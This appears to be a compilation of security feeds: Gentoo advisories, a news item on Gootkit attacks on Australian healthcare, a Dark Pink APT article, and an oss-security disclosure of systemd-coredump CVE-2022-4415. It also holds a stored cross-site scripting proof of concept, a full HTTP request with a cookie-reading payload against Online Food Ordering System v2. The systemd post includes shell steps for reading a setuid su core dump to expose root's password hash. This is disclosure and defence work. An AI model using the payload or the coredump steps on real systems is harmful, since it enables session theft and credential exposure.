Gentoo Linux Security Advisory 202301-7 - Multiple vulnerabilities have been found in Alpine, the worst of which could result in denial of service. Versions less than 2.25 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Alpine: Multiple Vulnerabilities  
     Date: January 11, 2023  
     Bugs: #807613  
       ID: 202301-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Alpine, the worst of which  
could result in denial of service.

Background  
==========

Alpine is an easy to use text-based based mail and news client.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  mail-client/alpine         < 2.25                        >= 2.25

Description  
===========

Multiple vulnerabilities have been discovered in Alpine. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Alpine users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/alpine-2.25"

References  
==========

[ 1 ] CVE-2021-38370  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38370  
[ 2 ] CVE-2021-46853  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46853

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-07

Gentoo Linux Security Advisory 202301-6 - Multiple vulnerabilities have been discovered in liblouis, the worst of which could result in denial of service. Versions less than 3.22.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: liblouis: Multiple Vulnerabilities  
     Date: January 11, 2023  
     Bugs: #835093  
       ID: 202301-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in liblouis, the worst of  
which could result in denial of service.

Background  
==========

liblouis is an open-source braille translator and back-translator.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-libs/liblouis          < 3.22.0                    >= 3.22.0

Description  
===========

Multiple vulnerabilities have been discovered in liblouis. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All liblouis users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/liblouis-3.22.0"

References  
==========

[ 1 ] CVE-2022-26981  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26981  
[ 2 ] CVE-2022-31783  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31783

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-06

Online Food Ordering System version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Food Ordering System v2 - Stored Cross Site Scripting (XSS)# Date: 01/11/2023# Exploit Author: Alaeddin Berksoy# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPPPOST /fos/admin/ajax.php?action=save_category HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------212007370016574149261512413130Content-Length: 322Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/index.php?page=categoriesCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="id"-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="name"<img src onerror=alert(document.cookie);>-----------------------------212007370016574149261512413130--

Online Food Ordering System 2.0 Cross Site Scripting

Gentoo Linux Security Advisory 202301-5 - A vulnerability has been discovered in Apache Commons Text which could result in arbitrary code execution. Versions less than 1.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Apache Commons Text: Arbitrary Code Execution  
     Date: January 11, 2023  
     Bugs: #877577  
       ID: 202301-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Apache Commons Text which could  
result in arbitrary code execution.

Background  
==========

Apache Commons Text is a library focused on algorithms working on  
strings.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-java/commons-text      < 1.10.0                    >= 1.10.0

Description  
===========

Apache Commons Text performs variable interpolation, allowing properties  
to be dynamically evaluated and expanded. The standard format for  
interpolation is "${prefix:name}", where "prefix" is used to locate an  
instance of org.apache.commons.text.lookup.StringLookup that performs  
the interpolation. The set of default Lookup instances included  
interpolators that could result in arbitrary code execution or contact  
with remote servers. These lookups are: - "script" - execute expressions  
using the JVM script execution engine (javax.script) - "dns" - resolve  
dns records - "url" - load values from urls, including from remote  
servers Applications using the interpolation defaults in the affected  
versions may be vulnerable to remote code execution or unintentional  
contact with remote servers if untrusted configuration values are used.

Impact  
======

Crafted input to Apache Commons Text could trigger remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache Commons Text users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-java/commons-text-1.10.0"

References  
==========

[ 1 ] CVE-2022-42889  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42889

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-05

Gentoo Linux Security Advisory 202301-4 - A vulnerability has been discovered in jupyter_core which could allow for the execution of code as another user. Versions less than 4.11.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-04  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: jupyter_core: Arbitrary Code Execution  
     Date: January 11, 2023  
     Bugs: #878497  
       ID: 202301-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in jupyter_core which could allow  
for the execution of code as another user.

Background  
==========

jupyter_core contains core Jupyter functionality.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-python/jupyter_core    < 4.11.2                    >= 4.11.2

Description  
===========

jupyter_core trusts files for execution in the current working directory  
without validating ownership of those files.

Impact  
======

By writing to a directory that is used a the current working directory  
for jupyter_core by another user, users can elevate privileges to those  
of another user.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All jupyter_core users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/jupyter_core-4.11.2"

References  
==========

[ 1 ] CVE-2022-39286  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39286

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-04

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-04

Gentoo Linux Security Advisory 202301-3 - A vulnerability was found in scikit-learn which could result in denial of service. Versions less than 1.1.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: scikit-learn: Denial of Service  
     Date: January 11, 2023  
     Bugs: #758323  
       ID: 202301-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability was found in scikit-learn which could result in denial  
of service.

Background  
==========

scikit-learn is a machine learning library for Python.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  sci-libs/scikit-learn      < 1.1.1                      >= 1.1.1

Description  
===========

When supplied with a crafted model SVM, predict() can result in a null  
pointer dereference.

Impact  
======

An attcker capable of providing a crafted model to scikit-learn can  
result in denial of service.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All scikit-learn users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sci-libs/scikit-learn-1.1.1"

References  
==========

[ 1 ] CVE-2020-28975  
      https://nvd.nist.gov/vuln/detail/CVE-2020-28975

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-03

Gentoo Linux Security Advisory 202301-2 - Multiple vulnerabilities have been discovered in Twisted, the worst of which could result in denial of service. Versions less than 22.10.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202301-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Twisted: Multiple Vulnerabilities  
     Date: January 11, 2023  
     Bugs: #878499, #834542, #832875  
       ID: 202301-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Twisted, the worst of  
which could result in denial of service.

Background  
==========

Twisted is an asynchronous networking framework written in Python.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  dev-python/twisted         < 22.10.0                  >= 22.10.0

Description  
===========

Multiple vulnerabilities have been discovered in Twisted. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Twisted users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/twisted-22.10.0"

References  
==========

[ 1 ] CVE-2022-21712  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21712  
[ 2 ] CVE-2022-21716  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21716  
[ 3 ] CVE-2022-39348  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39348

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202301-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202301-02

A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 21 Dec 2022 12:51:24 +0100
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: systemd-coredump: CVE-2022-4415: local information leak due to
 systemd-coredump not respecting fs.suid\_dumpable kernel setting

Hello list,

this is the publication of a report that was privately shared with the
linux-distros mailing list on 2022-12-09 with a communicated coordinated
release date of 2022-12-20.

I made small changes to the report to reflect recent developments.

This report is about a security issue I found in systemd-coredump.
systemd-coredump is a userspace coredump handler for Linux that is part
of the systemd suite \[1\].

\[1\]: https://github.com/systemd/systemd

The Issue
=========

systemd-coredump sets the sysctl fs.suid\_dumpable by default to 2 via
a sysctl.d drop-in configuration file. For the kernel's builtin coredump
handling this setting means that core dumps for setuid (or otherwise
privileged) processes will be written to disk but will only be
accessible to the root user to avoid sensitive data leaking to
unprivileged user accounts. See also \`man 5 proc\` for the full
documentation of this sysctl.

systemd-coredump in userspace, however, does not respect this kernel
setting in the implementation of its coredump handling. The real user ID
of a dumping process will receive read access to the core dump via an
ACL entry:

    someuser$ cat /proc/sys/kernel/core\_pattern
    |/usr/lib/systemd/systemd-coredump %P %u %g %s %t %c %h
    someuser$ cat /cat /proc/sys/fs/suid\_dumpable
    2
    someuser$ /usr/bin/su # run a setuid-root program and keep it running
    Password:
    
    # in another shell trigger a SEGFAULT in the setuid-root program
    someuser$ kill -s SIGSEGV \`pidof su\`
    
    # back in the original shell
    Password: Segmentation fault (core dumped)
    someuser$ cd /var/lib/systemd/coredump
    someuser$ ls -l
    -rw-r-----+ 1 root root 90K Okt 20 11:59 core.su.1000.76f0e40af2a240d98e50b90ab141d974.3529.1666259998000000.zst
    someuser$ getfacl core.su.\*
    # file:
    # core.su.1000.76f0e40af2a240d98e50b90ab141d974.3529.1666259998000000.zst
    # owner: root
    # group: root
    user::rw-
    user:someuser:r--
    group::r--
    mask::r--
    other::---

I have reproduced this on openSUSE Tumbleweed with systemd version 251.
I have been able to reproduce it also on other current Linux
distributions like Arch, Debian, Fedora and SLES.

Patch and Workaround
====================

Attached are the current (two) patches I received from systemd upstream.
Upstream published the fix by now in their GitHub repository \[2\].

A simple workaround without patching systemd-coredump is to revert the
sysctl setting of fs.suid\_dumpable back to 0. In this mode the kernel
will not invoke systemd-coredump for privileged programs. The issue will
thus not be triggered.

\[2\]: https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c

Affected Versions
=================

The vulnerable default of the fs.suid\_dumpable sysctl has been present
since systemd version 246 (introduced via commit 6635f57d3ee). Even
older versions may be affected though, should a system administrator
decide to change this setting to 2.

Upstream states that only systemd starting with version 247 are
affected, I don't know how they come to this different conclusion.

Upstream also states that only builds of systemd with libacl support are
affected. This makes sense since the read access to the core dumps is
granted via ACL entries and there is no fallback to this.

Exploit and Severity
====================

Exploiting this issue is pretty simple at the outset. Regular users are
allowed to send arbitrary signals to privileged processes they create.
Thus the privileged processes can be forced to dump core at arbitrary
points in time and the memory contents of the program will become
accessible via systemd-coredump.

Whether data obtained this way allows for a relevant information leak
depends on the timing, on the one hand, and on the type of program
executed on the other hand. What comes to mind is attempting to obtain
the password hash for the root user account that is stored in
/etc/shadow. Tools like 'su' and 'sudo' will have to process these
password hashes when authenticating the invoking user.

With 'sudo' this will not work, because it actively sets the ulimit for
coredumps to 0. The reason for this is to protect against exactly this
attack scenario \[3\].

With 'su' it works, however. Attached you can find a Python script I
created that shows that it is relatively simple to obtain the root
user's hash digest from /etc/shadow. From here on an attacker can
attempt to crack the hash using a GPU rig, for example. While it is not
a simple local root exploit it can be one if there is a dedicated
attacker.

Other setuid programs (or also programs running only with certain raised
Linux capabilties) could allow for different kinds of information leaks.
Even for 'su' it depends a lot on the PAM stack configuration. Some PAM
modules might read in data from private files in the target user's home
directory, or private configuration files which could leak via
systemd-coredump.

\[3\]: https://github.com/sudo-project/sudo/blob/3040bf54c99ed1baa9e7006be2fed3d5fa71f80e/docs/sudo.man.in#L1260

Timeline
========

2022-10-20: I sent a first report and some questions to
            systemd-security@...hat.com, offering coordinated disclosure.
2022-11-28: Communication did not progress much; I investigated the issue
            further by creating a PoC. Upstream confirmed the issue now and
            acknowledged a higher severity than initially considered.
2022-12-09: The final patches have been shared with us and we agreed to
            the CRD 2022-20-20. I shared the report with the
	    linux-distros mailing list.
2022-12-12: The CVE assignment was communicated by upstream and I also
            shared it with the linux-distros mailing list.
2022-12-20: Upstream published the fix.

Regards

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Security Engineer
https://www.suse.com/security
GPG Key ID: 0x14C405C971923553
 
SUSE Software Solutions Germany GmbH
HRB 36809, AG Nürnberg
Geschäftsführer: Ivo Totev, Andrew Myers, Andrew McDonald, Boudien Moerman

**View attachment "**0001-coredump-adjust-whitespace.patch**" of type "**text/plain**" (5417 bytes)**

**View attachment "**0002-coredump-do-not-allow-user-to-access-coredumps-with-.patch**" of type "**text/plain**" (15695 bytes)**

**View attachment "**su\_core\_shadow\_extract.py**" of type "**text/plain**" (6337 bytes)**

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (834 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-4415: security - systemd-coredump: CVE-2022-4415: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting

A wave of Gootkit malware loader attacks has targeted the Australian healthcare sector by leveraging legitimate tools like VLC Media Player.
Gootkit, also called Gootloader, is known to employ search engine optimization (SEO) poisoning tactics (aka spamdexing) for initial access. It typically works by compromising and abusing legitimate infrastructure and seeding those sites with common keywords

Healthcare / Cyber Threat

A wave of Gootkit malware loader attacks has targeted the Australian healthcare sector by leveraging legitimate tools like VLC Media Player.

Gootkit, also called Gootloader, is known to employ search engine optimization (SEO) poisoning tactics (aka spamdexing) for initial access. It typically works by compromising and abusing legitimate infrastructure and seeding those sites with common keywords.

Like other malware of its kind, Gootkit is capable of stealing data from the browser, performing adversary-in-the-browser (AitB) attacks, keylogging, taking screenshots, and other malicious actions.

Trend Micro's new findings reveal that the keywords "hospital," "health," "medical," and "enterprise agreement" have been paired with various city names in Australia, marking an malware's expansion beyond accounting and law firms.

The starting point of the cyber assault is to direct users searching for the same keywords to an infected WordPress blog that tricks them into downloading malware-laced ZIP files.

"Upon accessing the site, the user is presented with a screen that has been made to look like a legitimate forum," Trend Micro researchers said. "Users are led to access the link so that the malicious ZIP file can be downloaded."

What's more, the JavaScript code that's used to pull off this trickery is injected into a valid JavaScript file at random sections on the breached website.

The downloaded ZIP archive, for its part, also contains a JavaScript file that, upon execution, not only employs obfuscation to evade analysis, but is further used to establish persistence on the machine by means of a scheduled task.

The execution chain subsequently leads to a PowerShell script that's designed to retrieve files from a remote server for post-exploitation activity, which commences only after a waiting period that ranges from a couple of hours to as long as two days.

"This latency, which clearly separates the initial infection stage from the second stage, is a distinctive feature of Gootkit loader's operation," the researchers said.

Once the wait time elapses, two additional payloads are dropped – msdtc.exe and libvlc.dll – the former of which is a legitimate VLC Media Player binary that's used to load the Cobalt Strike DLL component, followed by downloading more tools to facilitate discovery.

"The malicious actors behind \[Gootkit\] are actively implementing their campaign," the researchers said. "The threats targeting specific job sectors, industries, and geographic areas are becoming more aggressive."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Australian Healthcare Sector Targeted in Latest Gootkit Malware Attacks

By Habiba Rashid
The Dark Pink APT group has been targeting countries in the APAC region.
This is a post from HackRead.com Read the original post: Espionage Meets Color: Dark Pink APT Group Revealed

So far, the cybersecurity researchers at Group-IB have uncovered seven confirmed attacks carried out by the Dark Pink hackers.

Group-IB’s recent blog warns of a relatively new advanced persistent threat (APT) group which brings more dangerous espionage techniques and procedures to the table than seen before.

Labelled ‘Dark Pink’ by Group-IB’s analysts; this APT group is behind a new wave of attacks that have struck the Asia-Pacific (APAC) region. 

This APT group has also been termed Saaiwc Group by Chinese cybersecurity researchers. Dark Pink’s operations can be dated as far back as mid-2021 according to Group-IB’s researchers who identified activity on its GitHub account. However, the group’s activity surged in the period from mid to late 2022. 

In their detailed report, Group-IB states that their sector-leading Threat Intelligence uncovered seven confirmed attacks by Dark Pink. The majority of these attacks were in the APAC region with just one carried out against a European governmental ministry. 

“The confirmed victims include two military bodies in the Philippines and Malaysia, government agencies in Cambodia, Indonesia and Bosnia and Herzegovina, and a religious organization in Vietnam. Group-IB also became aware of an unsuccessful attack on a European state development agency based in Vietnam,” the blog post states.

Timeline and targets of Dark Pink APT group (Image: Group-IB)

What makes Dark Pink’s attacks so effective is their use of a new set of tactics, techniques, and procedures rarely ever seen before amongst APT groups. Their custom toolkit consists of TelePowerBot, KamiKakaBot, and Cucky and Ctealer information stealers (all names given by Group-IB). They are also able to infect USB devices attached to compromised computers and gain access to messengers on infected machines.

One of Dark Pink’s spear-phishing emails used to gain initial access was found by Group-IB. In this particular instance, the threat actor posed as a job applicant applying for the PR and Communications intern position.

In the email, the threat actor mentions that they found the vacancy on a jobseeker site, which could suggest that the threat actors scan job boards and use this information to create highly relevant phishing emails. This only goes to show how carefully these phishing emails are curated for them to become so threatening. 

In the aforementioned attack, the email contained a shortened URL linking to a free-to-use file-sharing site where the victim can choose to download an ISO image. This contains all the files needed for the threat actors to infect the victim’s network.

In this situation, the victim is likely to look for the supposed applicant’s resume, often sent as an MS Word document, but the threat actor included a .exe file that mimicked an MS Word file. By using the MS Word icon and writing “.doc” in the file name, the threat actors tried to confuse the victim into believing the file was safe to open.

Kill Chain of the Dark Pink APT group (Image: Group-IB)

Group-IB details all their findings regarding Dark Pink’s kill chains, initial access, reconnaissance and lateral movement, data exfiltration, evasion techniques, and tools. They hope that this preliminary research will allow cybersecurity experts to raise awareness of the new TTPs utilized by Dark Pink and will aid organizations in taking relevant steps to protect themselves from potentially devastating APT attacks. 

Along with shedding light on the detrimental effects of APT groups leveraging new TTPs, it is our aim to highlight a set of precautions that can be taken by organizations in order to protect themselves from targeted and highly decisive attacks. 

Here are some steps that organizations can take to cultivate a securer workplace culture:

*   Employ modern email protection measures that are highly effective in thwarting hacking campaigns right at the first step by preventing initial compromise via spear-phishing emails. 
*   Train your personnel to identify phishing emails and educate them on the damage they can cause.
*   Ensure that your security measures allow for proactive threat hunting that can help identify threats that cannot be detected automatically.
*   Limit access to file-sharing resources, with the exception of those used within the organization.
*   Monitor the creation of LNK files in unusual locations, such as network drives and USB devices.
*   Ensure that you observe any use of commands and built-in tools that are frequently used for collecting information about the system and files.

1.  NK APT37 Unleashes Dolphin Backdoor on SK
2.  APT Groups Trapping Targets with Clever Twitter Scheme
3.  Malicious Office docs make up 43% of all malware downloads
4.  Windows, Linux and macOS Users Hit by Chinese Iron Tiger Group
5.  Indian APT exposes Modus Operandi by infecting their own devices

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Tag

#mac